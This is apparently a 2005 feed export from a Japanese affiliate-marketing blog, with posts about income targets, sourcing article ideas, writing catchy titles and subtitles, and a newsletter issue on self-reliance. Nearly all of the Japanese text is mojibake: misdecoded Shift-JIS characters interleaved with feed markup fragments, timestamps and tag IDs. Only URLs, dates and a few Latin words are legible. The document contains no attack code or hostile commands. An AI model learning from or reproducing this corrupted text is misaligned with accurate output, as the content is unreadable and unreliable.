-—\’ט‚נ¡“ת‚©‚ח‡”װ‚ֹ—§‚ִ‚ִ‚¢‚­‚ּ‚ֵ‚ֽ‚ָ‚­A’ק‚״‚ט‚ֶ‹‰‚נ’ט‚µ‚ִA‚»‚±‚©‚ח‹tZ‚µ‚ִ—\’ט‚נ—§‚ִ‚ִ‚¢‚­B‚±‚¿‚ח‚ּ‚‚₪‚×’Zתװ‚ֵ‚ז‚ט‘½‚­‚ּ‚±‚ֶ‚נ¬‚µ‹‚°‚ח‚ך‚‚·B

    - -

    „‚ֵּ‹‚ּƒAƒtƒBƒƒGƒCƒ^[‚ֶ‚µ‚ִ‚ּˆ“®‚ֽA‚‚³‚ֹ‚±‚ּ‚ג‚ט•‚ֵ‚·B
    -

    ]]> -©•ׂ׉^‰c‚µ‚ִ‚¢‚יƒ}ƒXƒ^[ƒYƒAƒtƒBƒƒGƒCƒgƒXƒN[ƒ‹‚ּ‚ָ‚©‚ֵAwװƒAƒtƒBƒƒGƒCƒ^[x‚ֶ‚¢‚₪G‚נ”­s‚µ‚ִ‚¢‚‚·B

    - -

    ‚»‚ּ‚ָ‚©‚ֵA©•שg‚ּƒAƒtƒBƒƒGƒCƒ^[‚ֶ‚µ‚ִ‚ּˆ“®‚נ•ס‚נ‚·‚יƒR[ƒi[‚ׂ ‚ט‚‚·B“ַׂ‚©‚ח•]”»‚ׂ¢‚¢ƒR[ƒi[‚ָ‚ּ‚ֵ‚·‚×A‚±‚ך‚ֱ‚ִ–ˆ‰ס•ס‚ֵ‚«‚י‚¾‚¯‚ּƒlƒ^‚ָׂ‚¯‚ך‚־‚¢‚¯‚‚¹‚סB

    - -

    ‚»‚ּ‚½‚Aֵ‹‚ֵ‚ֽA©•ׂ׈“®‚µ‚½‚±‚ֶ‚נƒlƒ^‚ֹ‚·‚י‚ּ‚ֵ‚ֽ‚ָ‚­Aƒlƒ^‚ֹ‚µ‚½‚¢‚±‚ֶ‚נ‚‚ֶ‚‚ִ‚»‚ּ’‚טˆ“®‚·‚י‚ז‚₪‚ֹ‚µ‚ִ‚¢‚‚·B

    - -


    -‚½‚ֶ‚¦‚־Aw¡‚ֽVƒTƒCƒg‚נ—§‚¿ד‚°‚ִA3–‰~‰ׂ‚¬‚‚µ‚½x‚ֶ‚¢‚₪‚ז‚₪‚ָ•ס‚נƒlƒ^‚ֹ‚·‚י‚ֶˆ‚‚½‚חA‚»‚ך‚×ְ»‚·‚י‚ז‚₪‚ֹs“®‚·‚י‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B

    - -

    ‚±‚ך‚×v‚¢‚ּ‚‚©Aר‰‚ׂ ‚י‚ס‚ֵ‚·B

    - -

    ˆ“®•ס‚ֶ‚¢‚ֱ‚ִ‚אA¸”s‚µ‚½•ס‚נo‚·‚¾‚¯‚ֵ‚ֽˆ׃–¡‚ָׂ‚¢‚ּ‚ֵA‚ַ‚₪‚µ‚ִ‚א¬ק–—ב‚נ•ס‚µ‚ָ‚¯‚ך‚־‚¢‚¯‚‚¹‚סB

    - -

    ‚»‚ּ‚½‚‚ֹ‚ֽ“–‘R¬ק‚·‚י•K—v‚ׂ ‚ט‚‚·B

    - -


    -‚ֵ‚·‚©‚חA–ˆ¬ק‚·‚י‚±‚ֶ‚׃mƒ‹ƒ}‚ֶ‚ָ‚ֱ‚ִ‚«‚ִ‚¢‚‚·B¬ק‚·‚ך‚־“‚ב‚¦‚י‚±‚ֶ‚ֹ‚ֲ‚ָ‚ׂט‚‚·‚ּ‚ֵ—L“ן‚¢‚±‚ֶ‚ֵ‚·B

    - -

    ז‚ֹ–]‚‹‰‚נˆ‚‚ִA‚»‚ּ‚½‚‚ֹs“®‚·‚יB‰½‹C‚ָ‚­‚¢‚¢•–@‚ֵ‚·B

    - -

    ƒ|ƒCƒ“ƒg‚ֽƒXƒpƒ“‚נ’Z‚­‚·‚י‚±‚ֶ‚ֵ‚·B

    - -

    ”¼”Nד‚ֹ100–‰~‚ֶ‚¢‚ֱ‚ִ‚אAז‚×’·‚·‚¬‚ִƒsƒ“‚ֶ‚«‚‚¹‚סB
    -lװ‚ו’‚ֹƒCƒ[ƒW‚ֵ‚«‚י‚ּ‚ֽ”Tװ‚©‚ח1ƒ–‚×ְ“x‚ּ‚ז‚₪‚ָ‹C‚ׂµ‚‚·B

    - -

    ‚ֵ‚·‚©‚חA1ƒ•ד‚ֹ‚±‚₪‚·‚יA1Tװד‚ֹ‚±‚₪‚·‚י‚ֶˆ‚‚ִA‚»‚ך‚נח‚י‚ז‚₪‚ֹs“®‚·‚י‚ּ‚׈ך”װ‚ֵ‚·B
    -‚±‚ך‚®‚ח‚¢‚ּƒXƒpƒ“‚ֵ‚ ‚ך‚־A–•W‚א»ְ“I‚ָ‚א‚ּ‚ֹ‚ָ‚י‚ּ‚ֵ–ג‘ט‚ָ‚µ‚ֵ‚·B
    -

    ]]> -
    -
    - -ƒlƒ^o‚µ‚ּ•–@ - -2005-12-23T07:06:38Z -2005-12-23T07:03:48Z -tag:1affliate.com,2005://1.312 -2005-12-23T07:03:48Z -‚±‚ּƒTƒCƒg‚ֵ‚אƒƒ‹ƒ}ƒK‚ֵ‚אA„‚ֽ‚ז‚­A”•Sƒy[ƒW‚®‚ח‚¢‚ּƒTƒCƒg‚נל‚ֱ‚ִ‚µ‚‚¦‚ֶ‚¢‚₪‚±‚ֶ‚נ¾‚ֱ‚ִ‚¢‚‚·B ‚±‚ך‚ֽ–{S‚ֵ‚·B¡A„‚ֽV‚µ‚¢ƒTƒCƒg‚נ—§‚¿ד‚°‚י‚ֹ‚ֵֽ’ב500ƒy[ƒWA‚ה‚­‚ה‚­‚ֽ1000ƒy[ƒW... - -ˆֹ“¡ “Nֶ -http://1affliate.com -info@1affliate.com - -•¶ֽ—ֽ - -‚±‚ּƒTƒCƒg‚ֵ‚אƒƒ‹ƒ}ƒK‚ֵ‚אA„‚ֽ‚ז‚­A”•Sƒy[ƒW‚®‚ח‚¢‚ּƒTƒCƒg‚נל‚ֱ‚ִ‚µ‚‚¦‚ֶ‚¢‚₪‚±‚ֶ‚נ¾‚ֱ‚ִ‚¢‚‚·B

    - -

    ‚±‚ך‚ֽ–{S‚ֵ‚·B¡A„‚ֽV‚µ‚¢ƒTƒCƒg‚נ—§‚¿ד‚°‚י‚ֹ‚ֵֽ’ב500ƒy[ƒWA‚ה‚­‚ה‚­‚ֽ1000ƒy[ƒW‚ֶ‚¢‚₪‚ּ‚נ–•W”’l‚ֶ‚µ‚ִ‚¢‚‚·i‚ה‚­‚ה‚­‚ֶ‚¢‚ֱ‚ִ‚אA”ƒ–’Pˆ‚ּ˜b‚ֵ‚·jBƒuƒƒO‚ּ‚¨‚©‚°‚ֵ¡‚ֽ‚±‚ס‚ָ‚±‚ֶ‚א‰ֲ”\‚ֹ‚ָ‚ט‚‚µ‚½B
    -

    ]]> -ƒTƒCƒgל¬‚ֹ‚ֲ‚¢‚ִ‚ֽ–ג‘ט‚ָ‚¢‚ּ‚ֵA‚ג‚ֽ‚טƒlƒbƒN‚ֶ‚ָ‚י‚ּ‚ֽƒlƒ^‚ֵ‚·B‚±‚ך‚¾‚¯‚ּƒy[ƒW‚נל¬‚·‚י‚¾‚¯‚ּƒlƒ^‚נ‚ַ‚₪‚ג‚ֱ‚ִ—pˆ׃‚·‚י‚ּ‚©A‚ֶ‚¢‚₪‚ּ‚׃|ƒCƒ“ƒg‚ֹ‚ָ‚ֱ‚ִ‚«‚‚·B

    - -


    -‚±‚ך‚ֽ‘¼‚ּƒTƒCƒg‚ג–{‚נQl‚ֹ‚µ‚½‚ט‚µ‚ָ‚ׂחl‚¦‚ִ‚¢‚­‚µ‚©‚ָ‚¢‚ּ‚ֵ‚·‚×A‚»‚ך‚א‚¢‚ֲ‚©‚ֽs‚«‚י‚ֽ‚¸‚ֵ‚·B‚»‚ס‚ָ‚ֶ‚«‚ֹA„‚׈—p‚µ‚ִ‚¢‚י‚ּ‚ֽG‚גV•·‚נg‚ֱ‚½‚±‚ס‚ָ‚ג‚ט•‚ֵ‚·B

    - -

    Ql‚ֹ‚·‚י‚ּ‚ֽ‹L–‚ּƒ^ƒCƒgƒ‹‚ֵ‚·B‚½‚ֶ‚¦‚־A‚ּ‚ז‚₪‚ָƒ^ƒCƒgƒ‹‚ׂ ‚ֱ‚½‚ֶ‚µ‚‚·B

    - -


    -{‚ּ‹G‚ֽ‚¨‚¢‚µ‚­צ‚י
    -’†«•‚—ֽ‘ו‰נ–U‚ּ×
    -“~‚נ§‚·‚יƒ_ƒCƒo[‚ֽƒI[ƒ‹ƒV[ƒYƒ“‚נ§‚·I

    - -


    -ט‹‚ֹ‚ ‚ֱ‚½‚ּ‚׃_ƒCƒrƒ“ƒOG‚¾‚ֱ‚½‚ּ‚ֵA‹»–¡‚ּ‚ָ‚¢l‚ֹ‚ֽˆ׃–¡‚ּ‚ם‚©‚ח‚ָ‚¢ƒRƒgƒo‚א“‚ֱ‚ִ‚¢‚‚·‚×A‚»‚±‚ֽ‹C‚ֹ‚µ‚ָ‚¢‚ֵ‚­‚¾‚³‚¢B

    - -

    ƒ|ƒCƒ“ƒg‚ֽ‚±‚ך‚ח‚נ©•ּׂƒTƒCƒg‚ּƒlƒ^‚ֹ‰—p‚·‚י‚±‚ֶ‚ֵ‚·B

    - -


    -‚½‚ֶ‚¦‚־A‚±‚ּw‚©‚©‚ֱ‚ִ‚±‚¢IƒAƒtƒBƒƒGƒCƒgx‚ּƒlƒ^‚ֹ‰—p‚·‚י‚ֶ‚µ‚‚µ‚ו‚₪B‚±‚ּך‡A‚±‚ך‚ח‚ּƒ^ƒCƒgƒ‹‚נ‚א‚¶‚ֱ‚ִA‚ּ‚ז‚₪‚ֹ‚µ‚‚·B

    - -


    -{‚ּ₪•i‚נ—˜—p‚µ‚ִ«‚­ƒAƒtƒBƒƒGƒCƒg
    -ƒAƒtƒBƒƒGƒCƒgASP‘ו‰נ–U‚ּ×
    -ƒ„ƒt[‚נ§‚·‚יƒAƒtƒBƒƒGƒCƒ^[‚ֽ‘S‚ִ‚ּץƒGƒ“ƒWƒ“‚נ§‚·I

    - -


    -‚±‚ך‚ֵ‹L–‚ּƒ^ƒCƒgƒ‹‚×o—ˆד‚ׂט‚ֵ‚·B‚±‚ך‚׃lƒ^‚ֵ‚·B
    -‚»‚µ‚ִA‚±‚ּƒ^ƒCƒgƒ‹‚ֹ‡‚ם‚¹‚ִA’†g‚נ‘‚¢‚ִ‚¢‚«‚‚·B

    - -

    ƒ|ƒCƒ“ƒg‚ֽ’†g‚נֵ‰‚ֹl‚¦‚י‚ּ‚ֵ‚ֽ‚ָ‚­Aֵ‰‚ֹƒ^ƒCƒgƒ‹‚נˆ‚‚ִA‚»‚±‚©‚ח’†g‚ֹ—‚ֶ‚µ‚ס‚ֵ‚¢‚­‚ֶ‚¢‚₪“_‚ֵ‚·B

    - -


    -ְ‚ֽ‚±‚ך‚ֽAG‚ָ‚ַ‚ֵי‰ז‚¾‚µ‚נ‚·‚י‚ֶ‚«‚ּם“…ט’i‚ֵ‚·B‚±‚₪‚ג‚ֱ‚ִl‚ּ‹C‚נ‚׀‚«‚»‚₪‚ָƒ^ƒCƒgƒ‹‚נv‚¢‚ֲ‚¢‚½‚חA‚»‚±‚©‚ח’†g‚נל‚ט‚±‚ס‚ֵ‚¢‚«‚‚·B

    - -

    G‚ּƒ^ƒCƒgƒ‹‚ֶ‚¢‚₪‚ּ‚ֽAƒvƒ‚ּl‚דַׂ‚ּ’ˆ׃‚נה‚«‚ֲ‚¯‚י‚א‚ּ‚נµ‘I‚µ‚ִ‘I‚ס‚ֵ‚¢‚‚·‚©‚חA‚»‚₪‚¢‚ֱ‚½‚א‚ּ‚נQl‚ֹ‚·‚ך‚־A–£—ֽ“I‚ָƒ^ƒCƒgƒ‹‚נל‚ך‚י‚±‚ֶ‚ֽװˆב‚¢‚ ‚ט‚‚¹‚סB

    - -

    ‚»‚±‚ֹ‡‚ם‚¹‚ִל‚ֱ‚ִ‚¢‚¯‚־A’†g‚א©‘R‚ֹ–£—ֽ“I‚ָ‚א‚ּ‚ֹ‚ָ‚ט‚‚·B

    - -

    ƒlƒ^‚׃Jƒ“ƒ^ƒ“‚ֹv‚¢‚ֲ‚­‚µA¿‚א‚ז‚­‚ָ‚י‚µ‚ֶ‚¢‚₪‚±‚ֶ‚ֵAˆך־“ס’¹‚ּ•–@‚ֵ‚·B¥”סA‚¨‚µ‚נII
    -

    ]]> -
    -
    - -–£—ֽ“I‚ָ©o‚µ‚ּל‚ט• - -2005-12-20T03:54:00Z -2005-12-20T03:51:51Z -tag:1affliate.com,2005://1.311 -2005-12-20T03:51:51Z -ƒTƒuƒy[ƒW‚ֹ‚ֽA‚»‚ך‚¼‚ךƒ^ƒCƒgƒ‹‚נ‚ֲ‚¯‚י‚ּ‚׈ך”“I‚ֵ‚·B‰½‹C‚ָ‚­‚ֲ‚¯‚ִ‚¢‚יl‚א‚¢‚י‚©‚א‚µ‚ך‚‚¹‚ס‚×A‚½‚¢‚ִ‚¢‚ּƒ†[ƒU[‚ֽƒ^ƒCƒgƒ‹‚נ‚‚ִAְ‚ֹ“ַ‚‚©‚ַ‚₪‚©‚נˆ‚‚‚·Bi–{‰®‚ֵ‚ַ‚₪‚ג‚ֱ‚ִ©•ׂדַ‚–{‚נ‘I... - -ˆֹ“¡ “Nֶ -http://1affliate.com -info@1affliate.com - -•¶ֽ—ֽ - -ƒTƒuƒy[ƒW‚ֹ‚ֽA‚»‚ך‚¼‚ךƒ^ƒCƒgƒ‹‚נ‚ֲ‚¯‚י‚ּ‚׈ך”“I‚ֵ‚·B‰½‹C‚ָ‚­‚ֲ‚¯‚ִ‚¢‚יl‚א‚¢‚י‚©‚א‚µ‚ך‚‚¹‚ס‚×A‚½‚¢‚ִ‚¢‚ּƒ†[ƒU[‚ֽƒ^ƒCƒgƒ‹‚נ‚‚ִAְ‚ֹ“ַ‚‚©‚ַ‚₪‚©‚נˆ‚‚‚·Bi–{‰®‚ֵ‚ַ‚₪‚ג‚ֱ‚ִ©•ׂדַ‚–{‚נ‘I‚װ‚©v‚¢o‚µ‚ִ‚‚ִ‚­‚¾‚³‚¢Bj
    -

    ]]> -
    -ƒ^ƒCƒgƒ‹‚ֶ‚¢‚₪‚ּ‚ֽ‚»‚ך‚¾‚¯d—v‚ֵ‚·B‚»‚±‚ֵAl‚ּ–‚נה‚«‚ֲ‚¯‚יƒTƒuƒ^ƒCƒgƒ‹‚ּל‚ט•‚ֹ‚ֲ‚¢‚ִ‚¨˜b‚µ‚‚·B

    - -

    ‚»‚₪‚ֽ‚¢‚ֱ‚ִ‚אA‚±‚ך‚ֽˆך¾‚ֵא–¾‚ֵ‚«‚י‚א‚ּ‚ֵ‚ֽ‚ ‚ט‚‚¹‚סB‚±‚ּƒe[ƒ}‚ֵ1‚ּ–{‚ב‚¯‚י‚®‚ח‚¢‚ֵ‚·B" target="_blank">‚±‚¿‚ח‚ּƒy[ƒW‚ֵƒIƒXƒXƒ–{‚נ׀‰מ‚µ‚ִ‚¢‚י‚ּ‚ֵA‚»‚¿‚ח‚נQl‚ֹ‚µ‚ִ‚­‚¾‚³‚¢B

    - -

    ‚±‚±‚ֵ‚ֽ„‚ׂז‚­g‚₪מ–{’†‚ּמ–{‚¾‚¯‚נ‚‚ֶ‚‚ִ‚‚‚µ‚½B

    - -
    -

    1.’†g‚נ—v–ס‚µ‚½‚א‚ּ

    - -

    ƒTƒuƒy[ƒW‚ּ“א—e‚נˆך–‚ֵ‚ם‚©‚י‚ז‚₪‚ֹ—v–ס‚µ‚½‚א‚ּ‚נƒTƒuƒ^ƒCƒgƒ‹‚ֹ‚·‚י‚ֶ‚¢‚₪‚ג‚ט•‚ֵ‚·B‚±‚ּƒTƒuƒy[ƒW‚ּƒ^ƒCƒgƒ‹‚ֽA‚‚³‚ֹ‚±‚ּ‚ג‚ט•‚ֵ‚·B

    - -
    -

    2.‹^–ג`

    - -

    l‚ֽ¿–ג‚³‚ך‚י‚ֶA©‘R‚ֶˆ׃¯‚ׂ»‚¿‚ח‚ֹ‚­‚ז‚₪‚ֹ‚ָ‚ט‚‚·B‚»‚ך‚נ—˜—p‚µ‚ִAƒTƒuƒ^ƒCƒgƒ‹‚נ‹^–ג`‚ֹ‚·‚י‚ֶA“ַ‚ס‚ֵ‚א‚ח‚¦‚יm—¦‚ׂ‚­‚ָ‚ט‚‚·B

    - -
    -

    3.’†“r”¼’[‚ֵI‚ם‚ח‚¹‚י

    - -

    ‚½‚ֶ‚¦‚־A‚±‚ּƒTƒuƒy[ƒW‚ּƒ^ƒCƒgƒ‹‚ֵ‚ ‚ך‚־Aw–£—ֽ“I‚ָ©o‚µ‚ּל‚ט•x‚ֵ‚ֽ‚ָ‚­w–£—ֽ“I‚ָ©o‚µ‚ֶ‚ֽEEEExAw–£—ֽ“I‚ָ•¶ֽ‚נ‘‚­‚ֶ‚«‚ֹ•K—v‚ָ‚±‚ֶ‚ֽEEEx‚ֶ‚¢‚₪‚ז‚₪‚ֹA•¶ֽ‚נ‚ם‚´‚ֶ’†“r”¼’[‚ָף‘װ‚ֵI‚ם‚ח‚¹‚י‚ֶ‚¢‚₪‚ּ‚אA‚¢‚¢•–@‚ֵ‚·B

    - -

    ‚±‚₪‚ָ‚י‚ֶA‘±‚«‚דַ‚‚½‚­‚ָ‚י‚ּ‚×lמ‚ֵ‚·B‚»‚ך‚¾‚¯‚ֹ‚‚¢ר‰‚נת‘ׂ‚ֵ‚«‚‚·B

    - -


    -‚ֶ‚ט‚ ‚¦‚¸Aמ–{‚ֶ‚ָ‚י3‚ֲ‚ּ•–@‚נ‚ ‚°‚³‚¹‚ִ’¸‚«‚‚µ‚½B

    - -

    ‚‚©‚ֹ‚אל‚ט•‚ֽFX‚ ‚ט‚‚·‚×A‚ֶ‚ט‚ ‚¦‚¸‚±‚ּ3‚ֲ‚נg‚¢‚±‚ָ‚¹‚י‚¾‚¯‚ֵ‚א”½‰‚׈ב‚ֱ‚ִ‚«‚‚·Bמ–{’†‚ּמ–{‚ָ‚ּ‚ֵA¥”סo‚¦‚ִ‚¨‚¢‚ִ‚­‚¾‚³‚¢B
    -

    ]]> -
    -
    - -No.029 - -2005-12-17T13:42:33Z -2005-12-17T13:38:12Z -tag:1affliate.com,2005://1.303 -2005-12-17T13:38:12Z -©•ֵׂl‚¦‚יKµ - -ˆֹ“¡ “Nֶ -http://1affliate.com -info@1affliate.com - -ƒoƒbƒNƒiƒ“ƒo[ - - - - -@ [@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp @] - - vol.29 - - - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@s@¡‰ס‚ּ–@t -@ -@y‚Pz‚ֽ‚¶‚‚ּ‚ ‚¢‚³‚ֲw”נ‹’n‚©‚חƒAƒtƒBƒƒGƒCƒgHx -@y‚Qz¡‰ס‚ּ¬קpw©•ֵׂl‚¦‚יKµx -@y‚Rz•ׂWד‹L -@ -@‚»‚ך‚ֵ‚ֽA‚ַ‚₪‚¼II@ - -@–ˆ“ת‚ּƒAƒtƒBƒƒGƒCƒg“‚נצJ‚µ‚ִ‚¢‚‚·II -@http://blog.livedoor.jp/affiliatemaseter/ -@w–w‚¹I300–‰~IIƒX[ƒp[ƒAƒtƒBƒƒGƒCƒ^[‚ײ‚ּ“¹x - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Pz‚ֽ‚¶‚‚ּ‚ ‚¢‚³‚ֲ -@@@@@@w”נ‹’n‚©‚חƒAƒtƒBƒƒGƒCƒgHx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -‚±‚ס‚ֹ‚¿‚ֽAˆֹ“¡‚ֵ‚·B -–ˆ“ת‹‚¢‚ֵ‚·‚ֻBזTA“ָ–״‚ְּ‰ֶ‚ֹ‹A‚ֱ‚ִ‚¢‚½‚ּ‚ֵ‚·‚×A“תץ‚ּ -‹‚­‚ָ‚ּ‚ֵA—ֱ‚µ‚­‚ִ‰‚²‚µ‚ג‚·‚©‚ֱ‚½‚ֵ‚·B - -‰ִ‚ֽ”נ‹’n‚ֹ‘״‚µ‚ָ‚ׂחƒAƒtƒBƒƒGƒCƒg - -‚»‚ס‚ָƒCƒ[ƒW‚דֹׂv‚¢•‚‚©‚ׁ‚‚µ‚½B -ך‚נ‘I‚־‚ָ‚¢‚ּ‚׃AƒtƒBƒƒGƒCƒg‚ּƒƒƒbƒg‚ָ‚ּ‚ֵA‚±‚ס‚ָƒ‰ƒCƒt -ƒXƒ^ƒCƒ‹‚×ְ»‚ֵ‚«‚ך‚־‚¢‚¢‚ָ‚ֶv‚¢‚‚·B - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Qz¡‰ס‚ּ¬קp -@@@@@@w©•ֵׂl‚¦‚יKµx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -ƒƒ‹ƒ}ƒK‚נ‘‚¢‚½‚טAƒuƒƒO‚נ‚ֲ‚¯‚ִ‚¢‚½‚ט‚ֶ‚¢‚₪‚ז‚₪‚ָמ•ס”­M‚נ -‚µ‚ִ‚¢‚י‚ֶA´‘zƒ[ƒ‹‚ג¿–גƒ[ƒ‹‚נ‘½‚­ףM‚·‚י‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B - -‚ֶ‚ִ‚אנ‚µ‚¢‚±‚ֶ‚ָ‚ּ‚ֵ‚·‚×A‚½‚‚ֹw‚¨‚גHHx‚ֶv‚₪‚±‚ֶ‚א -‚ ‚ט‚‚·B - - -‚±‚±ֵ‹‚ֵ‚אA‚±‚ס‚ָ‚±‚ֶ‚ׂ ‚ט‚‚µ‚½B - -„‚׉^‰c‚µ‚ִ‚¢‚יƒAƒtƒBƒƒGƒCƒgמ•סƒTƒCƒgw‚©‚©‚ֱ‚ִ‚±‚¢IƒAƒtƒBƒƒGƒCƒgx -‚ּ’†‚ֵƒTƒ“ƒvƒ‹ƒuƒƒK[‚ֶ‚¢‚₪ƒAƒtƒBƒƒGƒCƒgƒvƒƒOƒ‰ƒ€‚נ׀‰מ‚µ‚ִ‚¢‚‚·B - -ƒTƒ“ƒvƒ‹ƒuƒƒK[ -http://www.1affliate.com/archives/2005/05/3000.html - - -A8.neto—R‚ֵ’ס‹‚³‚ך‚ִ‚¢‚יA‚¿‚ו‚ֱ‚ֶ•ֿ‚ם‚ֱ‚½‚¨‚א‚µ‚כ‚¢ -ƒAƒtƒBƒƒGƒCƒg‚ֵ‚·B - - -‚ֶ‚±‚כ‚×A‚±‚ּƒvƒƒOƒ‰ƒ€AA8.net‚ֵwƒTƒ“ƒvƒ‹ƒuƒƒK[x‚ֶ‚¢‚₪‚׃‚₪‚ֹ -ץ‚נ‚©‚¯‚ִ‚א•\¦‚³‚ך‚‚¹‚סB - -‚»‚ּ‚½‚Aw‚‚ֲ‚©‚ט‚‚¹‚סx‚ֶ‚©w‚ַ‚₪‚ג‚ֱ‚½‚ח‚‚ח‚ך‚י‚ּ‚ֵ‚µ‚ו‚₪‚©Hx -‚ֶ‚¢‚₪¿–ג‚ב½”ס‚¹‚ח‚ך‚ִ‚¢‚‚·B - -•ׂ©‚ח‚ָ‚¢‚±‚ֶ‚נ¿–ג‚·‚י‚ּ‚ֽ‚¢‚¢‚±‚ֶ‚ָ‚ּ‚ֵ‚·‚×A‚ֵ‚א‚¿‚ו‚ֱ‚ֶc”O‚ֹ -v‚₪‚±‚ֶ‚ׂ ‚ט‚‚·B - -‚±‚ך‚ֱ‚ִAְ‚ֽ©•ֵׂ’²‚׳‚ז‚₪‚ֶ‚·‚ך‚־A‚·‚®‚ֹ‚ם‚©‚י‚±‚ֶ‚¾‚©‚ח‚ֵ‚·B - - -ƒO[ƒOƒ‹‚ֵwƒTƒ“ƒvƒ‹ƒuƒƒK[x‚ֶץ‚·‚ך‚־Aƒgƒbƒv‚ֹ‚±‚ּƒTƒCƒg‚× -•\¦‚³‚ך‚‚·B - -‚»‚±‚ֹƒAƒNƒZƒX‚·‚י‚ֶAƒƒfƒBƒAƒlƒbƒg‚ֶ‚¢‚₪‰ן׀‚׉^‰c‚µ‚ִ‚¢‚יƒT[ƒrƒX -‚ֶ‚¢‚₪‚±‚ֶ‚ׂם‚©‚ט‚‚·B - -‚»‚µ‚ִAA8.net‚ֵwƒƒfƒBƒAƒlƒbƒgx‚ֶ‚¢‚₪ƒL[ƒ[ƒh‚ֵץ‚·‚י‚ֶ -‚‚ֵ‚½‚­A‚»‚ּƒvƒƒOƒ‰ƒ€‚ֹ‚½‚ַ‚ט‚ֲ‚¯‚‚·B - -‚ֶ‚ֱ‚ִ‚אƒJƒ“ƒ^ƒ“‚ֵ‚·B’²‚׳‚י‚ז‚₪‚ֶˆ׃¯‚³‚¦‚ ‚ך‚־A‚ ‚ֱ‚ֶ‚¢‚₪װ‚ֵ‚·B - - -‚ֲ‚‚טA¿–ג‚נ‚µ‚ִ‚«‚½l‚ֶ‚¢‚₪‚ּ‚ֽ©•ֵׂ’²‚׳‚¸‚ֹA‚¢‚«‚ָ‚ט¿–ג‚נ -‚µ‚ִ‚«‚½‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B„‚×w‚ ‚ךHx‚ֶv‚ֱ‚½‚ּ‚ֽA‚±‚±‚ֵ‚·B - - -ƒAƒtƒBƒƒGƒCƒg‚ּ‚ז‚₪‚ָƒrƒWƒlƒX‚נ‚ג‚ֱ‚ִ‚¢‚ך‚־A‚ם‚©‚ח‚ָ‚¢‚±‚ֶ‚ָ‚ס‚ִ -פ‚ח‚ֵ‚א‚ ‚ט‚‚·B - -‚»‚ּ‚ֶ‚«‚ֹA©•ֵׂ’²‚׳‚י”\—ֽ‚ָׂ‚©‚ֱ‚½‚חA‚»‚±‚ֵI‚ם‚ט‚ֵ‚·B -¡‰ס‚ּƒP[ƒX‚ּ‚ז‚₪‚ֹ•·‚¯‚יl‚ׂ¢‚ך‚־‚¢‚¢‚ּ‚ֵ‚·‚×A‚»‚ס‚ָ‚±‚ֶ‚ֽ‹H‚ֵ‚·B - -‚»‚א‚»‚אA‚±‚₪‚ג‚ֱ‚ִ–ג‘ט‚נ©•ֵׂ‰נˆ‚µ‚ז‚₪‚ֶ“ׂנ“­‚©‚¹‚י‚±‚ֶ‚±‚»‚× -ƒXƒLƒ‹ƒAƒbƒv‚ֹ‚ֲ‚ָ‚ׂטA‚׀‚¢‚ִ‚ֽ©•ׂנ¬’·‚³‚¹‚י‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B - - -‚ֵ‚·‚©‚חA©•ֵׂl‚¦‚י‚ֶ‚¢‚₪ˆ׃¯‚נ‚½‚ָ‚¢l‚ֶ‚¢‚₪‚ּ‚ֽA‚ַ‚ס‚ַ‚ס -ז‚טc‚³‚ך‚י‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B - - -©•ֵׂl‚¦‚יl‚ֶl‚¦‚ָ‚¢l - -—¼ׂ‚ּ·‚ֶ‚¢‚₪‚ּ‚ֽA–{“–‚ֹ¬‚³‚ָˆ׃¯‚ּ·‚¾‚¯‚ֵ‚·B -‚ֵ‚אA‚»‚ּ¬‚³‚ָ·‚ַׂ‚ס‚ַ‚ס‘ו‚«‚­‚ָ‚ֱ‚ִA‚µ‚‚¢‚ֹ‚ֽM‚¶‚ח‚ך‚ָ‚¢‚‚ַA -—¼ׂ‚נu‚ִ‚י‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B - - -‚₪‚‚­‚¢‚©‚ָ‚¢‚ֶ‚«A‚‚¸©•ֵׂl‚¦‚יB -‚±‚ּKµ‚ֽ”סם‚ֹ‘ו״‚ָ‚ּ‚ֵA¥”סg‚ֹ‚ֲ‚¯‚ִ‚­‚¾‚³‚¢B -¬ק‚µ‚½‚¢‚ֶv‚₪‚ּ‚ֵ‚ ‚ך‚־•K{‚ּKµ‚ֵ‚·B - - -‚¿‚ָ‚‚ֹA‚±‚ך‚ֽמ•ס‚נW‚·‚י‘₪‚ּ—§ך‚©‚ח‚‚½ˆ׃©‚ֵ‚·B - - -‹t‚ֹA„‚ּ‚ז‚₪‚ָמ•ס”­M‘₪‚ּ—§ך‚©‚ח‚·‚י‚ֶAwƒTƒ“ƒvƒ‹ƒuƒƒK[x‚ֶ -‚¢‚₪ƒvƒƒOƒ‰ƒ€‚נ•ׂ©‚ט‚ֹ‚­‚¢`‚ֵ׀‰מ‚µ‚ִ‚µ‚‚ֱ‚½‚ֶ‚¢‚₪‚±‚ֶ‚ֹ‚ָ‚י‚ּ‚ֵA -”½ָ‚·‚׳‚«‚±‚ֶ‚ֵ‚·B - -‚»‚ס‚ָ‚ם‚¯‚ֵA‚±‚ּƒƒ‹ƒ}ƒK‚נ”­s‚µ‚½‚ ‚ֶAƒTƒ“ƒvƒ‹ƒuƒƒK[‚ּ׀‰מ -ƒy[ƒW‚ֽC³‚·‚י‚ז‚₪‚ֹ‚µ‚‚·B - -מ•ס‚ֽף‚¯ז‚ֱ‚ִ‰‚‚ִˆ׃–¡‚ׂ 